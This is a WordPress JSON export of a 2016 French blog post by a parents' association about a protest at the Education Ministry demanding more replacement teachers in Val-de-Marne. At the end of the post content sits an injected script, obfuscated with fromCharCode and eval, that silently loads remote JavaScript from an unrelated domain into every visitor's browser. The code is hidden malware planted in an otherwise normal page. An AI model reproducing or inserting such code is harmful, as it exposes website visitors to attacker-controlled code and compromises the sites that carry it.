{"id":7081,"date":"2016-03-23T21:50:37","date_gmt":"2016-03-23T20:50:37","guid":{"rendered":"http:\/\/education.acctif.eu\/?p=7081"},"modified":"2016-03-23T21:50:37","modified_gmt":"2016-03-23T20:50:37","slug":"non-remplacement-des-enseignants-absents-cette-fois-devant-le-ministere-de-leducation-nationale","status":"publish","type":"post","link":"http:\/\/actifeducation.fr\/?p=7081","title":{"rendered":"Non-remplacement des enseignants absents : ACCTIF Education devant le minist\u00e8re de l&rsquo;Education nationale"},"content":{"rendered":"<p>Apr\u00e8s la pr\u00e9fecture de Cr\u00e9teil vendredi 18 mars, une d\u00e9l\u00e9gation ACCTIF Education \u00e9tait pr\u00e9sente, cette fois-ci, devant le minist\u00e8re de l&rsquo;Education nationale, rue de Grenelle \u00e0 Paris, ce mercredi 23 mars. Objectif : demander davantage de postes d&rsquo;enseignants rempla\u00e7ants pour la rentr\u00e9e 2016.<\/p>\n<p>Ce rassemblement faisait suite \u00e0 un appel de\u00a0l\u2019intersyndicale SNUDI-FO, SNUipp-FSU, CGT Educ\u2019action, SUD Education ainsi que la f\u00e9d\u00e9ration de parents FCPE Val-deMarne, auquel vos repr\u00e9sentants ACCTIF Education se sont\u00a0joints.<\/p>\n<p>Le Minist\u00e8re a tout d&rsquo;abord\u00a0refus\u00e9 de recevoir une d\u00e9l\u00e9gation (\u00e9lus, syndicats ou parents d&rsquo;\u00e9l\u00e8ves), afin d&rsquo;\u00e9couter leurs revendications.\u00a0Apr\u00e8s insistance, une n\u00e9gociation port\u00e9e pa\u00a0Laurence\u00a0COHEN, s\u00e9natrice du Val de Marne, a \u00e9t\u00e9 possible. Une d\u00e9l\u00e9gation de 4 personnes (3 repr\u00e9sentants\u00a0syndicaux et 1 repr\u00e9sentant des\u00a0parents d \u00e9l\u00e8ves) ont \u00e9t\u00e9s re\u00e7us.<\/p>\n<div>\n<p>Pour rappel, nous avions d\u00e9j\u00e0 manifest\u00e9 devant la pr\u00e9fecture de Cr\u00e9teil vendredi 18 mars. Une d\u00e9l\u00e9gation compos\u00e9e d\u2019un repr\u00e9sentant ACCTIF Education et 2 FCPE avait alors \u00e9t\u00e9 re\u00e7ue pr\u00e8s d\u2019une heure pour r\u00e9-exposer les difficult\u00e9s rencontr\u00e9es cette ann\u00e9e, devant un comit\u00e9 d\u2019inspecteurs de l\u2019Education nationale.<\/p>\n<p>&gt;&gt;&gt; <strong>Lire \u00e0 ce sujet notre pr\u00e9c\u00e9dent billet :<\/strong> <a href=\"http:\/\/education.acctif.eu\/2016\/03\/18\/non-remplacement-toujours-mobilises\/\">Non-remplacement des enseignants absents : toujours mobilis\u00e9s !<\/a><\/p>\n<p>A l&rsquo;heure actuelle, le\u00a0CDEN (Conseil d\u00e9partemental de l\u2019Education nationale) ne pr\u00e9voit en effet que 15 postes de remplacements suppl\u00e9mentaires ((ZIL+Brigade) sur le Val-de-Marne pour l&rsquo;an prochain. Ce qui est tout \u00e0 fait IN-SU-FFI-SANT ! Surtout quand on voit toutes les peines que l&rsquo;Education nationale a\u00a0d\u00e9j\u00e0 \u00e0 remplacer les\u00a0enseignants absents cette ann\u00e9e, en particulier sur le groupe scolaire Roux, Pasteur, Blancs Bouleaux.<\/p>\n<\/div>\n<p>Des dysfonctionnements qui\u00a0nuisent gravement \u00e0 la bonne acquisition des savoirs de nos enfants et pose un s\u00e9rieux probl\u00e8me de s\u00e9curit\u00e9 (avec parfois un enseignant pour 2 classes)\u00a0! Comme vous le savez, nous\u00a0avons d\u00e9j\u00e0 alert\u00e9 \u00e0 2 reprises l&rsquo;inspection acad\u00e9mique par courrier et sollicit\u00e9 l&rsquo;aide de notre d\u00e9put\u00e9-maire Jean-Jacques Bridey. Pour l&rsquo;instant&#8230;\u00a0aucune r\u00e9ponse concr\u00e8te, ni m\u00eame des remplacements des enseignants absents plus rapides !<\/p>\n<p>&gt;&gt;&gt;<strong> Lire \u00e0 ce sujet :<\/strong> <a href=\"http:\/\/education.acctif.eu\/2016\/02\/14\/mobilisation-pour-le-remplacement-des-enseignants-absents\/\">Mobilisation pour le remplacement des enseignants absents<\/a><\/p>\n<p>Esp\u00e9rons donc que la ministre de l&rsquo;Education nationale, Najat Vallaud-Belkacem\u00a0saura entendre nos\u00a0r\u00e9clamations ! D&rsquo;autant qu&rsquo;il semble\u00a0que ce probl\u00e8me d\u00e9passe largement la ville de Fresnes ou m\u00eame le Val-de-Marne. A suivre, donc&#8230;<\/p>\n<p><strong>&gt;&gt;&gt; Vous pouvez lire aussi \u00e0 ce sujet l&rsquo;article de 94citoyens.com : <\/strong><a href=\"http:\/\/94.citoyens.com\/2016\/carte-scolaire-en-val-de-marne-lequation-impossible,17-03-2016.html\">Carte scolaire en Val-de-Marne : l&rsquo;\u00e9quation impossible<\/a><\/p>\n<blockquote><p>Et n&rsquo;oubliez pas <a href=\"http:\/\/education.acctif.eu\/signaler-un-enseignant-absent\/\">de nous signaler si l&rsquo;enseignant de votre enfant est absent<\/a> pour nous aider \u00e0 tenir\u00a0des d\u00e9comptes \u00e0 jour<\/p><\/blockquote>\n<p><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Apr\u00e8s la pr\u00e9fecture de Cr\u00e9teil vendredi 18 mars, une d\u00e9l\u00e9gation ACCTIF Education \u00e9tait pr\u00e9sente, cette fois-ci, devant le minist\u00e8re de l&rsquo;Education nationale, rue de Grenelle \u00e0 Paris, ce mercredi 23 mars. Objectif : demander davantage de postes d&rsquo;enseignants rempla\u00e7ants pour la rentr\u00e9e 2016. Ce rassemblement faisait suite \u00e0 un appel de\u00a0l\u2019intersyndicale SNUDI-FO, SNUipp-FSU, CGT Educ\u2019action, &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"http:\/\/actifeducation.fr\/?p=7081\"> <span class=\"screen-reader-text\">Non-remplacement des enseignants absents : ACCTIF Education devant le minist\u00e8re de l&rsquo;Education nationale<\/span> Lire la suite\u00a0\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":7083,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-7081","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-non-classe"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7081","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7081"}],"version-history":[{"count":0,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7081\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/"}],"wp:attachment":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7081"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7081"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7081"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}